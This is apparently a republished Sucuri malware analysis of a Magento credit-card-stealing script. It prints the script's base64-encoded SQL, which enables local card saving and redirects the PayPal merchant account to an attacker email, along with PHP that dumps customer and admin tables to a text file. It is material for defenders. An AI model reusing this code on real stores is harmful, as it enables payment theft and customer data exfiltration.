During the initial stages of the attack, the bad actor uses special SQL queries encoded in base64. We’ve decoded these strings under their respective lines in the sample below for your reference:In $ConfKiller,two major malicious operations are being executed: Update DB (Savecc): This function configures the Magento core function to get the client credit card information without letting it go through the typical payment processes that secures the payment information. Update PP (MailPP): This function allows the attacker to make changes in PayPal merchant business account associated with the Magento website. Though Magento does encrypt the locally saved credit card information, in this scenario, this process is not enough because the attacker can modify the Magento core file to steal the encryption from Magento file (./app/etc/local.xml). Once the attacker has access to your site, the attack usually doesn’t remain limited to just the credit card information. Rather, the attacker gains access to everything in the database. For this, the attacker can create an additional variable in the SQL queries to extract the information from the compromised Magento database.$ConfKiller = array( 'Update DB (Savecc)' => base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQNCmBzY29wZWAgPSAnZGVmYXVsdCcsDQpgc2NvcGVf aWRgID0gJzAnLA0KYHBhdGhgID0gJ3BheW1lbnQvY2NzYXZlL2FjdGl2ZScsDQpgdmFsdWVgID0gJzEnDQpXSEVSRSBgcGF 0aGAgPSAncGF5bWVudC9jY3NhdmUvYWN0aXZlJzs='), //UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'payment/ ccsave/active', `value` = '1' WHERE `path` = 'payment/ccsave/active'; 'Update PP (MailPP)' => base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQKYHNjb3BlYCA9ICdkZWZhdWx0JywKYHNjb3BlX2lk YCA9ICcwJywKYHBhdGhgID0gJ3BheXBhbC9nZW5lcmFsL2J1c2luZXNzX2FjY291bnQnLApgdmFsdWVgID0gJ1tyZWRhY3R lZF1AZ21haWwuY29tJwpXSEVSRSBgcGF0aGAgPSAncGF5cGFsL2dlbmVyYWwvYnVzaW5lc3NfYWNjb3VudCc7') //UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'paypal/ general/business_account', `value` = '[redacted]@gmail.com' WHERE `path` = 'paypal/general/ business_account';
$query = array( 'admin_user' => 'SELECT * FROM admin_user' , 'core_email_queue_recipients' => 'SELECT * FROM core_email_queue_recipients' ,'aw_blog_comment' => 'SELECT * FROM aw_blog_comment' , 'customer_entity' => 'SELECT * FROM customer_entity' ,The array listing has been shortened for brevity. But, it pulls any customer information stored in the most common Magento database tables (e.g customer_entity, newsletter_subscriber). It then trims this data, keeping only the information required for fraudulent purchases. Finally, it generates a *-shcMail.txt file in the directory containing the relevant customer information.$namefile = md5(time())."-shcMail.txt"; foreach ($query as $shc_key => $shc_query) { $hasil = mysql_query($shc_query); while ( $kolom_db = mysql_fetch_assoc($hasil) ) { $mail[] = $kolom_db[$shcolom[$shc_key]]; $myfile = fopen($namefile, "a+") or die("Unable to open file!"); fwrite($myfile, $kolom_db[$shcolom[$shc_key]]."\r\n"); fclose($myfile);When running this malicious script in a web browser, it simply provides a hyperlink to the generated *-shcMail.txt file. Then it reports back to inform the attacker if the initial two-setting changes were successful or not.
Source: Sucuri
Your greatest possible competitive advantage can be your clients and the interactions they have with… Read More
Digital marketing KPIs are measurable values that marketing teams use to track progress toward desired… Read More
In today's digital age, fraud poses a significant threat to businesses of all sizes. As… Read More
Financial crimes continue to evolve and proliferate in our increasingly digital, global economy. From complex… Read More
In the highly competitive modern workplace, trust, and employee loyalty are crucial factors for long-term… Read More
In the ever-evolving world of small business developing and implementing effective marketing strategies is critical to… Read More